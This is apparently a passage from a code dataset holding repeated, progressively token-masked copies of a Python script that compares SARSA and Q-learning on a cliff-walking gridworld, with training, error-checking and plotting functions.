best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\n<function token>\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\n<function token>\n<function token>\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\n<function token>\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * 